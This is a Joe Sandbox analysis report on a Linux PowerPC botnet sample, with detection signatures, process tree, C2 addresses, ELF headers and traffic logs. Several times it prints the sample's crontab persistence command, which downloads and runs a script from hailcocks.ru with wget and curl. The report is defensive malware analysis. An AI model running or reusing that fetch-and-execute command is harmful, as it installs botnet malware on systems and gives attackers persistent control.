Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkppc.elf

Overview

General Information

Sample name:nshkppc.elf
Analysis ID:1577080
MD5:c970abb702288d872bd58c91268bcc1f
SHA1:50d693fc548f04b57a7ed81632de23e3e69249fa
SHA256:c23ed5855615ca018b90281c83cf749def736b7482063a8c71c89e4c8ca38730
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1577080
Start date and time:2024-12-18 00:02:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkppc.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@33/0
  • VT rate limit hit for: nshkppc.elf
Command:/tmp/nshkppc.elf
PID:6238
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshkppc.elf (PID: 6238, Parent: 6162, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/nshkppc.elf
    • sh (PID: 6241, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6243, Parent: 6241)
        • sh New Fork (PID: 6245, Parent: 6243)
        • crontab (PID: 6245, Parent: 6243, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6244, Parent: 6241)
      • crontab (PID: 6244, Parent: 6241, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkppc.elfReversingLabs: Detection: 15%
Source: tmp.i80r9k.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 80.78.26.121 ports 17631,3266,20604,20767,0,2,4,6,24374,16854,13872
Source: global trafficTCP traffic: 212.64.215.71 ports 19269,8322,25509,24738,5232,3266,20767,0,1402,3,1851,6,7,6307,5956
Source: global trafficTCP traffic: 192.168.2.23:59948 -> 80.78.26.121:20604
Source: global trafficTCP traffic: 192.168.2.23:48198 -> 212.64.215.71:6307
Source: /tmp/nshkppc.elf (PID: 6238)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.i80r9k.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@33/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6245)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6244)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6244)File: /var/spool/cron/crontabs/tmp.i80r9kJump to behavior
Source: /usr/bin/crontab (PID: 6244)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkppc.elf (PID: 6241)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshkppc.elf (PID: 6238)Queries kernel information via 'uname': Jump to behavior
Source: nshkppc.elf, 6238.1.000055603b6ce000.000055603b79f000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
Source: nshkppc.elf, 6246.1.000055603b6ce000.000055603b79f000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: nshkppc.elf, 6238.1.00007ffed7e89000.00007ffed7eaa000.rw-.sdmp, nshkppc.elf, 6246.1.00007ffed7e89000.00007ffed7eaa000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/nshkppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkppc.elf
Source: nshkppc.elf, 6238.1.000055603b6ce000.000055603b79f000.rw-.sdmp, nshkppc.elf, 6246.1.000055603b6ce000.000055603b79f000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: nshkppc.elf, 6238.1.00007ffed7e89000.00007ffed7eaa000.rw-.sdmp, nshkppc.elf, 6246.1.00007ffed7e89000.00007ffed7eaa000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577080 Sample: nshkppc.elf Startdate: 18/12/2024 Architecture: LINUX Score: 60 30 80.78.26.121, 13872, 16854, 17631 CYBERDYNELR Cyprus 2->30 32 kingstonwikkerink.dyn 212.64.215.71, 1402, 1851, 19269 RACKSPACE-LONGB Turkey 2->32 34 3 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nshkppc.elf 2->9         started        signatures3 process4 process5 11 nshkppc.elf sh 9->11         started        13 nshkppc.elf 9->13         started        15 nshkppc.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nshkppc.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.i80r9k, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nshkppc.elf16%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
212.64.215.71
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.i80r9k.19.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      80.78.26.121
      unknownCyprus
      37560CYBERDYNELRtrue
      212.64.215.71
      kingstonwikkerink.dynTurkey
      15395RACKSPACE-LONGBfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      80.78.26.121nshkmpsl.elfGet hashmaliciousUnknownBrowse
        nshkmips.elfGet hashmaliciousUnknownBrowse
          nshkarm7.elfGet hashmaliciousUnknownBrowse
            nshkarm5.elfGet hashmaliciousUnknownBrowse
              nshkarm.elfGet hashmaliciousUnknownBrowse
                212.64.215.71nshkmpsl.elfGet hashmaliciousUnknownBrowse
                  nshkmips.elfGet hashmaliciousUnknownBrowse
                    nshkarm7.elfGet hashmaliciousUnknownBrowse
                      nshkarm5.elfGet hashmaliciousUnknownBrowse
                        nshkarm.elfGet hashmaliciousUnknownBrowse
                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                          91.189.91.43jew.arm5.elfGet hashmaliciousMiraiBrowse
                            abc123.elfGet hashmaliciousUnknownBrowse
                              jew.arm6.elfGet hashmaliciousUnknownBrowse
                                nshkmpsl.elfGet hashmaliciousUnknownBrowse
                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                    la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                      la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                        cmc.elfGet hashmaliciousUnknownBrowse
                                          la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                              91.189.91.42jew.arm5.elfGet hashmaliciousMiraiBrowse
                                                abc123.elfGet hashmaliciousUnknownBrowse
                                                  jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                    nshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                      nshkmips.elfGet hashmaliciousUnknownBrowse
                                                        la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                            cmc.elfGet hashmaliciousUnknownBrowse
                                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  kingstonwikkerink.dynnshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkarm.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBjew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  abc123.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  nshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  cmc.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  RACKSPACE-LONGBnshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  nshkarm.elfGet hashmaliciousUnknownBrowse
                                                                  • 212.64.215.71
                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                  • 92.52.99.131
                                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 89.234.28.7
                                                                  Josho.arm.elfGet hashmaliciousUnknownBrowse
                                                                  • 89.234.45.46
                                                                  https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                                                  • 134.213.193.62
                                                                  meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 134.213.250.148
                                                                  CYBERDYNELRnshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkarm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  nshkarm.elfGet hashmaliciousUnknownBrowse
                                                                  • 80.78.26.121
                                                                  GjNVpV53SR.exeGet hashmaliciousQuasarBrowse
                                                                  • 80.78.28.83
                                                                  p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 185.193.127.129
                                                                  PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                                                                  • 80.78.24.30
                                                                  FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                  • 80.78.24.30
                                                                  PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                  • 80.78.24.30
                                                                  INIT7CHjew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  abc123.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  nshkmpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  cmc.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  No context
                                                                  No context
                                                                  Process:/usr/bin/crontab
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):306
                                                                  Entropy (8bit):5.153013255557498
                                                                  Encrypted:false
                                                                  SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvmuHaZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKw:8QjHig8SuHeeHLUHYC+GABjnOGAFkz
                                                                  MD5:8AD10B85198BDA5B84A0513B175224AA
                                                                  SHA1:B990B87042999427B3FF720DA00DC21BD4ECE1E6
                                                                  SHA-256:BBCE4B7F1813C86B449E9E8E320F1373C5198758A987CCA19AE0705D4BA74890
                                                                  SHA-512:8895448676540CB5C14F9EAE8CA17D6B7161C01392B48A2F10D54BE9880A97599043ED7DB09F9713CEDC770C86A1A467EB135C2422423439DDEAF44B9329A738
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 17:02:55 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                                  Entropy (8bit):6.228109663405758
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:nshkppc.elf
                                                                  File size:75'204 bytes
                                                                  MD5:c970abb702288d872bd58c91268bcc1f
                                                                  SHA1:50d693fc548f04b57a7ed81632de23e3e69249fa
                                                                  SHA256:c23ed5855615ca018b90281c83cf749def736b7482063a8c71c89e4c8ca38730
                                                                  SHA512:ba8824900347ebf17eba829f9e1e61c630f4a24572d253bcdcaaebadd37d531788bde1336b0a04870c54d10c15cb51ab0e908d82b78110c2d60fd26e56180c42
                                                                  SSDEEP:1536:hMR5ImvsygsBkvyVtIcaVCSIptg3wIq9VwbX3:haImVG+teVCHpv6X3
                                                                  TLSH:3F734B42B31C0947C1A76DF0363F17D093BFAA9121E4FA84655FAB4A92B2E331546ECD
                                                                  File Content Preview:.ELF...........................4..#......4. ...(.......................................... ... ... .......T.........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........$...../...@..\?..... ..+../...A..$8...}).... .N..

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, big endian
                                                                  Version:1 (current)
                                                                  Machine:PowerPC
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x100001f0
                                                                  Flags:0x0
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:3
                                                                  Section Header Offset:74724
                                                                  Section Header Size:40
                                                                  Number of Section Headers:12
                                                                  Header String Table Index:11
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .initPROGBITS0x100000940x940x240x00x6AX004
                                                                  .textPROGBITS0x100000b80xb80x103400x00x6AX004
                                                                  .finiPROGBITS0x100103f80x103f80x200x00x6AX004
                                                                  .rodataPROGBITS0x100104180x104180x19f40x00x2A008
                                                                  .ctorsPROGBITS0x100220000x120000x80x00x3WA004
                                                                  .dtorsPROGBITS0x100220080x120080x80x00x3WA004
                                                                  .dataPROGBITS0x100220180x120180x3440x00x3WA008
                                                                  .sdataPROGBITS0x1002235c0x1235c0x3c0x00x3WA004
                                                                  .sbssNOBITS0x100223980x123980x680x00x3WA004
                                                                  .bssNOBITS0x100224000x123980x508c0x00x3WA004
                                                                  .shstrtabSTRTAB0x00x123980x4b0x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x100000000x100000000x11e0c0x11e0c6.29630x5R E0x10000.init .text .fini .rodata
                                                                  LOAD0x120000x100220000x100220000x3980x548c3.01560x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 18, 2024 00:02:53.847948074 CET43928443192.168.2.2391.189.91.42
                                                                  Dec 18, 2024 00:02:59.479352951 CET42836443192.168.2.2391.189.91.43
                                                                  Dec 18, 2024 00:03:00.247157097 CET4251680192.168.2.23109.202.202.202
                                                                  Dec 18, 2024 00:03:01.821381092 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:01.900163889 CET481986307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:01.940963984 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:01.941076994 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:01.941433907 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:02.019809008 CET630748198212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:02.020025969 CET481986307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:02.020303965 CET481986307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:02.060914040 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:02.061054945 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:02.139796019 CET630748198212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:02.139977932 CET481986307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:02.180643082 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:02.259572983 CET630748198212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:04.329830885 CET630748198212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:04.330307961 CET481986307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:04.451670885 CET630748198212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:11.950428963 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:12.070038080 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:14.581140041 CET43928443192.168.2.2391.189.91.42
                                                                  Dec 18, 2024 00:03:23.835638046 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:23.835951090 CET5994820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:23.955632925 CET206045994880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:26.867405891 CET42836443192.168.2.2391.189.91.43
                                                                  Dec 18, 2024 00:03:29.357110023 CET482006307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:29.476897955 CET630748200212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:29.477227926 CET482006307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:29.477227926 CET482006307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:29.597044945 CET630748200212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:29.597284079 CET482006307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:29.716955900 CET630748200212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:30.962908983 CET4251680192.168.2.23109.202.202.202
                                                                  Dec 18, 2024 00:03:31.810190916 CET630748200212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:31.810702085 CET482006307192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:31.930454969 CET630748200212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:42.065046072 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:42.184648991 CET176313999280.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:42.184762955 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:42.185050011 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:42.304785013 CET176313999280.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:42.305005074 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:42.424700022 CET176313999280.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:43.485713959 CET176313999280.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:43.485972881 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:43.486048937 CET3999217631192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:48.730323076 CET5223619269192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:48.850014925 CET1926952236212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:48.850105047 CET5223619269192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:48.850318909 CET5223619269192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:48.863920927 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:48.969991922 CET1926952236212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:48.970124960 CET5223619269192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:48.983695984 CET206045995880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:48.983808041 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:48.983922958 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:49.089766979 CET1926952236212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:49.104535103 CET206045995880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:49.104752064 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:49.225264072 CET206045995880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:51.160392046 CET1926952236212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:51.160701990 CET5223619269192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:51.280330896 CET1926952236212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:53.295187950 CET206045995880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:03:53.295401096 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:53.295547962 CET5995820604192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:03:55.535494089 CET43928443192.168.2.2391.189.91.42
                                                                  Dec 18, 2024 00:03:56.403908968 CET362525232192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:56.523616076 CET523236252212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:56.523715973 CET362525232192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:56.523938894 CET362525232192.168.2.23212.64.215.71
